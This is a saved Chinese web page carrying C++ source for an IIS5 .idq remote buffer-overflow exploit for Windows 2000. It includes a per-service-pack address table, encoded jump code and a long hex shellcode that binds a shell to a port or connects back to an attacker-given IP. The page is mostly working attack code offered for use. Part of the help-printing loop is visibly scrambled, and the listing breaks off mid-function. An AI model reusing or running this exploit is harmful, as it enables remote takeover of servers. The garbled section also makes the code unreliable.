📄 snake的iis5_idq命令行溢出程序源代码.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0062)http://snake.gnuchina.org/IISOverflow/snake_iis_idq_source.htm -->
<HTML><HEAD><TITLE>SNAKE的IIS5_IDQ命令行溢出程序源代码</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content=zh-cn http-equiv=Content-Language>
<META content="Microsoft FrontPage 5.0" name=GENERATOR>
<META content=FrontPage.Editor.Document name=ProgId></HEAD>
<BODY bgColor=#000000 text=#ffffff>
<P align=center><FONT color=#00ff00
size=4><B>SNAKE的IIS5_IDQ命令行溢出程序源代码</B></FONT></P>
<P> </P>
<P> </P>
<P> </P>
<P>文件结构:</P>
<UL>
<LI><FONT color=#00ffff>cpp文件: iisidqoverflow.cpp 和
SkShellCodeFunc.cpp</FONT>
<LI><FONT color=#00ffff>头文件: SkShellCodeFunc.h</FONT>
<LI><FONT color=#ffff00><B>功能文件: WSAStart.cpp和SnakeSocket.cpp wsastart.h
snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!)</B></FONT>
<LI><FONT color=#00ffff>中间文件: iis_idq.asm
--用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出.</FONT>
</LI></UL>
<P> </P>
<P><FONT color=#ff00ff><B>文件1:iisidqoverflow.cpp (主文件)</B></FONT></P><PRE>#include <afxwin.h>
#include "snakesocket.h"
#include "wsastart.h"
#include "SkShellCodeFunc.h"
//function predeclare.
//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize);
//生成我的 shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);
//宣示帮助.
void ShowHelp()
{
int i;
printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>\r\n");
printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>\r\n");
printf("\r\n\r\n 其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");
printf("\r\n 如果为1,那么,将输入新的命令.");
printf("\r\n\r\n支持的操作系统 类型: ----\r\n");
for( i=0; i<MAX_SYSTEM_TYPE_NUM; iLen="MakeIDQShellCode(" if( lpszExecCmd); pConnectStruct, SystemType, szBuff, sizeof(szBuff)); iLen; int szBuff[4096]; char { lpszExecCmd) LPCTSTR *pConnectStruct, ConnectStruct SYSTEM_TYPE msocket, SOCKET SendIDQExploit( BOOL 发送溢出数据 } 07\r\n?); 2000 snake12.top263.net http: printf(?\r\n ?); snake. by 0013 Build Overflow.v2.0 IDQ IIS5 ); (SYSTEM_TYPE)i) GetSystemName( i, %s\r\n?, -- %d printf(? i++){> 0){
send( msocket, szBuff, iLen, 0);
}
return (iLen>0)?true:false;
}
int main(int argc, char *argv[])
{
CWSAStart wsaStart;
CSnakeSocket snakeSocket;
WORD wPort;
DWORD dwIP;
if( argc > 1){
if( stricmp( argv[1], "GetAddr") == 0){
char szTemp[12048];
GetNecesProcAddr(szTemp, sizeof(szTemp) );
printf("%s\r\n",szTemp);
OSVERSIONINFO osInfo;
osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx( &osInfo);
printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n",
osInfo.dwMajorVersion, osInfo.dwMinorVersion,
osInfo.dwBuildNumber, osInfo.dwPlatformId,
osInfo.szCSDVersion);
return 0;
}
}
if( argc < 5){
ShowHelp();
return 0;
}
wsaStart.StartUP();
SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);
if( SystemType >= MAX_SYSTEM_TYPE_NUM){
printf("操作系统类型 不正确.\r\n");
ShowHelp();
return 0;
}
dwIP = snakeSocket.GetHostAddr( argv[2]);
if( dwIP == 0){
printf("输入地址不对.\r\n");
return 0;
}
Sk_ConnectType connectType;
ConnectStruct connectStruct;
char szCommand[129]="cmd.exe /c dir c:\\";
BOOL bInputCommand=false;
connectType = (Sk_ConnectType)atoi(argv[4]);
connectStruct.byConnectType = connectType;
switch(connectType){
case LISTEN_ON_PORT:
connectStruct.wListenPort = atoi(argv[5]);
if( argc >= 7){
bInputCommand = true;
}
break;
case CONNECT_TO_HOST:
if( argc < 6){
printf("参数不足够.\r\n");
return 0;
}
connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);
connectStruct.wConnectPort = atoi(argv[6]);
if( argc >= 8){
bInputCommand = true;
}
break;
default:
printf("溢出类型不正确.\r\n");
return 0;
}
if( bInputCommand){
printf("\r\n请输入绑定的命令:");
scanf( "%s",szCommand);
}
snakeSocket.CreateSocket();
wPort = atoi(argv[3]);
if( !snakeSocket.connect( argv[2], wPort)){
printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);
return 0;
}
else
printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);
BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);
if( bValue){
printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);
printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);
}
else{
printf( "发送失败, 对方系统类型不支持\r\n");
}
snakeSocket.CloseSocket();
wsaStart.CleanUP();
return 0;
}
</PRE>
<P><FONT color=#ff00ff><B>文件2. SkShellCodeFunc.cpp
(发送shellcode的文件)</B></FONT></P><PRE>//SkShellCodeFunc.cpp
////////////////////////////////////////////////////////////////////////////////
// shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include "SkShellCodeFunc.h"
//搜索JUMP_EBX的地址
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);
static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=
{
"IIS5中文Win2k Sp0",
"IIS5中文Win2k Sp1",
"IIS5中文Win2k Sp2",
"IIS5 English Win2k Sp0",
"IIS5 English Win2k Sp1",
"--IIS5 English Win2k Sp2",
"IIS5 Japanese Win2k Sp0",
"IIS5 Japanese Win2k Sp1",
"--IIS5 Japanese Win2k Sp2",
"IIS5 Mexico Win2k",
"--IIS5 Mexico Win2k sp1",
"--IIS5 Mexico Win2k sp2",
"Unknown..",
};
//取得一个系统的名字.
LPCTSTR GetSystemName( SYSTEM_TYPE type)
{
if( type > MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM;
return szSystemName[type];
}
typedef struct _Call_Func_Addr{
DWORD dwGetModuleHandle;
DWORD dwGetProcAddress;
DWORD dwRetJmpEbxAddr;
}Call_Func_Addr;
//2个函数的地址(不通的系统有不通的地址)
static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=
{
{ 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0
{ 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1
{ 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2
{ 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0
{ 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1
{ 0, 0}, //IIS5_WIN2K_ENGLISH_SP2
{ 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,
{ 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,
{ 0, 0}, //IIS5_WIN2K_JAPANESE_SP2,
{ 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,
};
//下面的#define 代码 的分析,是从isno的文章里面copy到的,thanks isno.
#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset */
static unsigned char forwardjump[]= "%u08eb";
/*这是覆盖异常结构的jmp 08h,用来跳到后面寻址shellcode的那段代码*/
static unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
/*
跳转到shellcode去,我不一句句的解释了,如果有兴趣可以自己看,
注意每两个字节都是反的,%uC033在转换后变成了\x33\xC0。
*/
//下面的数据,可以绑定shell到一个端口,并且监听.
char szSnakeBindShellCode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0\xEB\x03\x90\xEB\x4E\xE8\xF9\xFF\xFF\xFF\x55\x8B\xEC\x57\x51\x50\x52\x8B\x7D\x08\x8B\x4D\x0C\x8B\x45\x10\x8B\x55\x14\xF2\xAE\x67\xE3\x06\x4F\x88\x17\x41\xEB\xF5\x5A\x58\x59\x5F\x5D\xC3\x53\x51\x52\x33\xD2\x50\x5B\xC1\xEB\x10\x50\x59\x80\xFF\x01\x74\x02\xFE\xCB\x8A\xC3"
"\x85\xD2\x75\x08\xC1\xE0\x08\x51\x5B\x42\xEB\xEB\x5A\x59\x5B\xC3\xEB\x4F\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x7D\x08\x8B\x75\x0C\x33\xDB\x33\xC9\xB1\x80\x03\xF1\x8A\x0E\x46\x51\x8A\x1E\x46\x56\x8B\x45\x10\xFF\xD0\x03\xF3\x33\xC9\x8A\x0E\x46\x51\x8A\x1E\x46\x50\x56\x56\x50\x8B\x4D\x14\xFF\xD1\x89\x07\x83\xC7"
"\x04\x5E\x58\x03\xF3\x59\xE2\xE7\x59\xE2\xD3\x58\x5B\x59\x5A\x5F\x5E\x5D\xC3\xEB\x7C\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x03\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8D\xBD\xC0\xFC\xFF\xFF\x33\xC0\xB0\x02\x57\x50\x8B\x46\x54\xFF\xD0\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\x38\xFF\xD0\x8B\x55\x0C\x8D\x1A\x8A\x0B\x50\x8D"
"\xBD\x10\xFF\xFF\xFF\x8D\x1F\x33\xC0\xB0\x02\x66\x89\x03\x58\x80\xF9\x01\x75\x69\x50\x50\x8B\x42\x04\xE8\x31\xFF\xFF\xFF\x8B\xC8\x86\xE9\x58\x8D\x5F\x02\x8B\x55\x0C\x66\x89\x0B\x33\xC0\x8D\x5F\x04\x89\x03\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x3C\xFF\xD0\xEB\x02\xEB\x4D\x58\x50\x33\xC9\x41\x51\x50\x8B\x46"
"\x40\xFF\xD0\x58\x50\x33\xC9\xB1\x10\x8D\xBD\x40\xFF\xFF\xFF\x89\x0F\x57\x8D\xBD\x10\xFF\xFF\xFF\x57\x50\x8B\x46\x44\xFF\xD0\x5A\x50\x52\x8B\x46\x58\xFF\xD0\x58\x83\xF8\xFF\x74\x7A\xEB\x53\x50\x8B\x42\x10\xE8\xC9\xFE\xFF\xFF\x8B\xC8\x86\xE9\x8D\x5F\x02\x66\x89\x0B\xEB\x02\xEB\x6A\x8B\x42\x08\xE8\xB3\xFE\xFF\xFF"
"\x8B\xC8\xC1\xE1\x10\x8B\x42\x0C\xE8\xA6\xFE\xFF\xFF\x66\x8B\xC8\x8D\x5F\x04\x89\x0B\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x5C\xFF\xD0\x8B\xC8\x58\x67\xE3\x0B\x90\x50\x8B\x46\x58\xFF\xD0\x33\xC0\xEB\x25\x50\x50\x5A\x8D\xBD\x10\xFF\xFF\xFF\x33\xC0\xB0\x01\x89\x07\xC1\xE0\x02\x50\x57\x66\xB8\x06\x10\x50\x66"
"\xB8\xFF\xFF\x50\x52\x8B\x46\x50\xFF\xD0\x58\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x62\x55\x8B\xEC\x57\x56\x52\x51\x53\x50\x8B\x7D\x0C\x57\x5A\x33\xC0\x8D\x7F\x24\x57\x33\xC9\xB1\x44\xF3\xAA\x5F\x8D\x37\xB1\x44\x89\x0E\x8D\x77\x2C\x66\xB9\x01\x01\x89\x0E\x57\x8D\x7F\x38\x8D\x72\x0C\x8B\x06\x89\x07\x5F\x57\x8D"
"\x7F\x3C\x8D\x72\x04\x8B\x06\x89\x07\x5F\x8B\x75\x08\x8B\x46\x30\xFF\xD0\x33\xC9\x51\x41\x51\x41\x51\x8D\x57\x40\x52\x50\x56\x8B\x75\x0C\x8D\x76\x04\x8B\x1E\x5E\xEB\x02\xEB\x42\x53\x50\x8B\x46\x2C\xFF\xD0\x33\xC0\x8B\x7D\x0C\x8D\x57\x14\x52\x8D\x57\x24\x52\x50\x50\x50\x40\x50\x48\x50\x50\x8B\x55\x10\x52\x50\x8B"
"\x46\x0C\xFF\xD0\x8B\x47\x0C\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x04\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59\x5A\x5E\x5F\x8B\xE5\x5D\xC3\xEB\x33\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x75\x08\x8B\x7D\x0C\x8B\x47\x10\x50\x8B\x46\x58\xFF\xD0\x8B\x07\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x08\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59"
"\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x77\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x02\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x8D\x55\xF8\x33\xC0\x40\x89\x02\x8D\x55\xF8\x8B\x02\x85\xC0\x74\x2A\x33\xC0\x50\xB0\xF0\x50\x8D\x85\x08\xFF\xFF\xFF\x50\x8D\x5F\x10\x8B\x03\x50\x8B\x46\x4C\xFF\xD0\x83\xF8\xFF\x75\x0F\x50"
"\x5A\x8B\x46\x28\xFF\xD0\x66\x3D\x4C\x27\x74\x28\xEB\x7F\x85\xC0\x74\x7B\x7E\x20\x33\xD2\x52\x8D\x5D\xFC\x53\x50\x8D\x9D\x08\xFF\xFF\xFF\x53\x8B\x47\x08\x50\x8B\x46\x18\xFF\xD0\x85\xC0\x74\x5D\xEB\x02\xEB\x62\x33\xC0\x50\x8D\x55\xFC\x52\x50\x50\x50\x8B\x07\x50\x8B\x46\x10\xFF\xD0\x8B\x45\xFC\x85\xC0\x74\x3B\x33"
"\xC0\x50\x8D\x55\xFC\x52\xB0\xF0\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x07\x50\x8B\x46\x1C\xFF\xD0\x85\xC0\x74\x23\x33\xC0\x50\x8B\x45\xFC\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x47\x10\x50\x8B\x46\x48\xFF\xD0\x83\xF8\xFF\x74\x07\xEB\xAC\xE9\x4C\xFF\xFF\xFF\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x72\x55\x8B\xEC\x33"
"\xC0\xB0\xF0\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x33\xDB\x8D\x7D\xF0\x8D\x57\x04\x89\x1A\x8D\x57\x08\x43\x89\x1A\x8D\x17\xB3\x0C\x89\x1A\x33\xDB\x57\x53\x57\x8B\x7D\x0C\x8D\x57\x04\x89\x1A\x52\x8D\x17\x52\x8B\x46\x04\xFF\xD0\x5F\x85\xC0\x74\x1F\x33\xDB\x53\x57\x8B\x7D\x0C\x8D\x57\x08\x52\x8D\x57"
"\x0C\x89\x1A\x52\x8B\x46\x04\xFF\xD0\x85\xC0\x74\x05\x33\xC0\x40\xEB\x05\x33\xC0\xEB\x01\x90\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\x8D\x34\x24\x8B\x36\x33\xC9\x66\xB9\xCC\x04\x03\xF1\x8D\xBD\x30\xFE\xFF\xFF\x57\x66\xB9\xFA\x01\xF3\xA4\x5F\x57\x33\xC9\x51\xB1\x2B\x51\x66\xB9\xE6\x01\x51\x33\xDB\xB3\x14\x03\xFB\x57"
"\xE8\xCC\xFB\xFF\xFF\x83\xC4\x10\x33\xC9\x66\xB9\xDD\x01\x8B\xF7\x03\xF1\x8B\x46\x04\x50\x8B\x06\x50\x57\x8D\xB5\x30\xFD\xFF\xFF\x56\xE8\xF6\xFB\xFF\xFF\x83\xC4\x10\x5F\x57\x56\xE8\x3C\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x57\x8D\xBD\x10\xFC\xFF\xFF\x8D\x5F\x10\x89\x03\x57\x56\xE8\x16\xFF\xFF\xFF\x83\xC4\x08\x85"
"\xC0\x74\x3E\x8D\xBD\x30\xFE\xFF\xFF\x33\xC0\xB0\x14\x03\xF8\x57\x8D\xBD\x10\xFC\xFF\xFF\x57\x56\xE8\x3B\xFD\xFF\xFF\x83\xC4\x0C\x57\x56\xE8\x0E\xFE\xFF\xFF\x83\xC4\x08\x57\x56\xE8\xCF\xFD\xFF\xFF\x83\xC4\x08\x33\xC0\x50\x8D\x57\x14\x8B\x02\x50\x8B\x06\xFF\xD0\x33\xC0\x50\x8B\x46\x24\xFF\xD0\xC3\x8B\xE5\x5D\x90"
"\x90\x02\xFF\xFF\xFF\x51\x01\x01\x02\x01\x02\x25\x01\xC0\x01\xA8\x01\x58\x01\x01\x02\x63\x6D\x64\x2E\x65\x78\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B"
"\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x02\x0E\x6B\x65\x72\x6E\x65"
"\x6C\x33\x32\x2E\x64\x6C\x6C\x2B\x2B\x0E\x11\x54\x65\x72\x6D\x69\x6E\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x2B\x0B\x43\x72\x65\x61\x74\x65\x50\x69\x70\x65\x2B\x10\x47\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49\x6E\x66\x6F\x41\x2B\x0F\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x2B\x0E\x50\x65\x65\x6B"
"\x4E\x61\x6D\x65\x64\x50\x69\x70\x65\x2B\x0C\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x2B\x0B\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x2B\x2B\x09\x52\x65\x61\x64\x46\x69\x6C\x65\x2B\x06\x53\x6C\x65\x65\x70\x2B\x0C\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0E\x47\x65\x74\x4C\x61\x73\x74\x45\x72\x72\x6F\x72"
"\x2B\x2B\x10\x44\x75\x70\x6C\x69\x63\x61\x74\x65\x48\x61\x6E\x64\x6C\x65\x2B\x12\x47\x65\x74\x43\x75\x72\x72\x65\x6E\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0C\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C\x65\x2B\x0B\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x2B\x0B\x07\x73\x6F\x63\x6B\x65\x74\x2B\x05\x62\x69\x6E\x64\x2B"
"\x07\x6C\x69\x73\x74\x65\x6E\x2B\x07\x61\x63\x63\x65\x70\x74\x2B\x05\x73\x65\x6E\x64\x2B\x05\x72\x65\x63\x76\x2B\x0B\x73\x65\x74\x73\x6F\x63\x6B\x6F\x70\x74\x2B\x0B\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x2B\x0C\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x2B\x08\x63\x6F\x6E\x6E\x65\x63\x74\x2B\x0C\x67\x65\x74"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\xDB\x56\xE7\x77\x4B\x56\xE7\x77\x00";
//我的私有信息:
static const char szSnakeSign[]="snake_program_code_v2.0";
#define PREHEAD_NOP_SIZE 0x24
#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE
#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE
#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE
#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE
#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE
#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE
#define wExecCommandSize 128
#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE
#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE
BYTE byReservedValue[]={ 0, 0x0a, 0x0d};
;//转换标准word -> snake ShellCode Reserve Value.
;//该 byte == 0, 0x0a, 0x0d,那么,高位为2. 低位 +1.
;// 高位 为1,低位不变.
DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)
{
int iReservCount, i;
WORD wTemp;
DWORD dwRetValue = 0;
BOOL bFirst=true;
iReservCount = sizeof(byReservedValue)/sizeof(BYTE);
while(1){
wTemp = wValue&0xff00;
wTemp >>= 8;
for( i=0; i<iReservCount; i++){
if( wTemp == byReservedValue[i]) break;
}
if( i == iReservCount)
wTemp |= 0x0100;
else{
wTemp++;
wTemp |= 0x0200;
}
dwRetValue |= wTemp;
if( bFirst){
bFirst = false;
dwRetValue <<= 16;
wValue <<=8;
}
else
break;
}
return dwRetValue;
}
typedef void (*SkRunPointer)();
//生成我的 IIS5 idq shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)
{
char szBuf[2048];
char szOutput[10000], szCreateCode[10000];
char *p;
DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;
WORD wSelectValue = MAX_SYSTEM_TYPE_NUM;
switch( SystemType){
case IIS5_WIN2K_CHINESE_SP0:
wSelectValue = IIS5_WIN2K_CHINESE_SP0;
break;
case IIS5_WIN2K_CHINESE_SP1:
wSelectValue = IIS5_WIN2K_CHINESE_SP1;
break;
case IIS5_WIN2K_CHINESE_SP2:
wSelectValue = IIS5_WIN2K_CHINESE_SP2;
break;
case IIS5_WIN2K_ENGLISH_SP0:
wSelectValue = IIS5_WIN2K_ENGLISH_SP0;
break;
case IIS5_WIN2K_ENGLISH_SP1:
wSelectValue = IIS5_WIN2K_ENGLISH_SP1;
break;
case IIS5_WIN2K_ENGLISH_SP2:
break;
case IIS5_WIN2K_JAPANESE_SP0:
wSelectValue = IIS5_WIN2K_JAPANESE_SP0;
break;
case IIS5_WIN2K_JAPANESE_SP1:
wSelectValue = IIS5_WIN2K_JAPANESE_SP1;
break;
case IIS5_WIN2K_JAPANESE_SP2:
wSelectValue = IIS5_WIN2K_JAPANESE_SP2;
break;
case IIS_WIN2K_MEXICO_SP0:
wSelectValue = IIS_WIN2K_MEXICO_SP0;
break;
case IIS_WIN2K_MEXICO_SP1:
wSelectValue = IIS_WIN2K_MEXICO_SP1;
break;
case IIS_WIN2K_MEXICO_SP2:
wSelectValue = IIS_WIN2K_MEXICO_SP2;
break;
default:
break;
}
if( wSelectValue >= MAX_SYSTEM_TYPE_NUM) return 0;
dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;
dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;
dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;
if( dwGetModuleHandle == 0) return 0;
memset( szBuf, 1, sizeof(szBuf));
memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));
p = &(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);
</PRE><PRE> wsprintf( p,"%s", forwardjump);
p += strlen((char *)forwardjump);
*p++ = 1;
*p++ = '%';
*p++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>0)&0xffff);
p += 4;
*p ++ = '%';
*p ++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>16)&0xffff);
p += 4;
*p++ = 1;
wsprintf( p, "%s", jump_to_shell);
//wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nShell: %s\r\n\r\n", szBuf, szMyCode);
wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nSnake: ", szBuf);
memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));
//将地址信息, 端口信息 写入 shellcode代码.
DWORD *pdw, dwTemp;
WORD wTemp;
char *lpsz, szExecTemp[wExecCommandSize];
//Init Value.
switch( pConnectStruct->byConnectType){
case LISTEN_ON_PORT:
szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wListenPort);
lpsz = &( szCreateCode[dwListenPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set listen port.
break;
case CONNECT_TO_HOST:
szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;
wTemp = (WORD)( (pConnectStruct->dwConnectIP) & 0xffff);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP2_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set IP1.
wTemp = (WORD)( ((pConnectStruct->dwConnectIP) & 0xffff0000) >> 16);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP1_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set IP2.
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wConnectPort);
lpsz = &( szCreateCode[dwConnectPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set connect Port.
break;
default:
return 0;
}
lpsz = &( szCreateCode[dwGetModuleHandle_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetModuleHandle; //set dwGetModuleHandle.
lpsz = &( szCreateCode[dwGetProcAddress_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetProcAddress; //set dwGetProcAddress.
memset( szExecTemp, '+', wExecCommandSize);
wTemp = strlen( lpszBindCmd);
if(wTemp >= wExecCommandSize)
wTemp = wExecCommandSize-1;
strncpy( szExecTemp, lpszBindCmd, wTemp);
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -